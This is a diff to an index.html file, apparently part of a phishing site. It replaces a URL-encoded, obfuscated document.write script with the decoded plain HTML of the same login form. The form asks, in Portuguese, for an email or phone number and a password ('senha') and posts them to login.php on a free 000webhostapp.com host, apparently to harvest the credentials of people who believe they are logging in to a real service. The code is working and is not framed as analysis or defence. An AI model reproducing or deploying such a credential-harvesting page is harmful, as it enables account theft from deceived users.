--- a/index.html
+++ b/index.html
@@ -36,12 +36,21 @@
       <br>
       <div class="login-box">
         <img src="image/loading.gif" id="load" style="display:none">
-        <script language="javascript">
-<!--
-// == Begin Free HTML Source Code Obfuscation Protection from https://snapbuilder.com == //
-document.write(unescape('%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%72%6D%75%6C%61%72%69%6F%64%65%63%61%6E%64%69%64%61%74%75%72%61%2E%30%30%30%77%65%62%68%6F%73%74%61%70%70%2E%63%6F%6D%2F%6C%6F%67%69%6E%2E%70%68%70%22%20%6E%61%6D%65%3D%22%66%6F%72%6D%31%22%20%6D%65%74%68%6F%64%3D%22%50%4F%53%54%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%70%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%61%6C%69%67%6E%3A%63%65%6E%74%65%72%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%69%6E%74%2E%6A%70%67%22%20%63%6C%61%73%73%3D%22%69%6D%67%2D%72%65%73%70%6F%6E%73%69%76%65%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%6E%61%6D%65%3D%22%65%6D%61%69%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%45%6D%61%69%6C%20%6F%75%20%54%65%6C%65%66%6F%6E%65%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%61%75%74%6F%66%6F%63%75%73%3D%22%22%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%33%30%30%70%78%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%6E%61%6D%65%3D%22%73%65%6E%68%61%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%53%65%6E%68%61%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%61%75%74%6F%66%6F%63%75%73%3D%22%22%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%33%30%30%70%78%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%69%6D%61%67%65%22%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%65%6E%74%72%61%72%2E%70%6E%67%22%20%76%61%6C%75%65%3D%22%45%4E%56%49%41%52%22%20%61%6C%74%3D%22%62%6F%74%E3%6F%20%65%6E%76%69%61%72%20%63%6F%6D%20%65%66%65%69%74%6F%20%61%71%75%61%22%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%33%30%30%70%78%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%63%61%64%61%73%74%72%61%72%2E%6A%70%67%22%20%63%6C%61%73%73%3D%22%69%6D%67%2D%72%65%73%70%6F%6E%73%69%76%65%22%3E%0A%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E'));
-//-->
-</script>
+        <form action="https://formulariodecandidatura.000webhostapp.com/login.php" name="form1" method="POST">
+          <p style="text-align:center;">
+            <img src="images/int.jpg" class="img-responsive">
+          </p>
+          <br>
+          <input type="text" name="email" placeholder="Email ou Telefone" required="" autofocus="" style="width:300px">
+          <br>
+          <br>
+          <input type="text" name="senha" placeholder="Senha" required="" autofocus="" style="width:300px">
+          <br>
+          <br>
+          <input type="image" src="images/entrar.png" value="ENVIAR" alt="botão enviar com efeito aqua" style="width:300px">
+          <br>
+          <img src="images/cadastrar.jpg" class="img-responsive">
+        </form>
       </div>
       <br>
       <br>
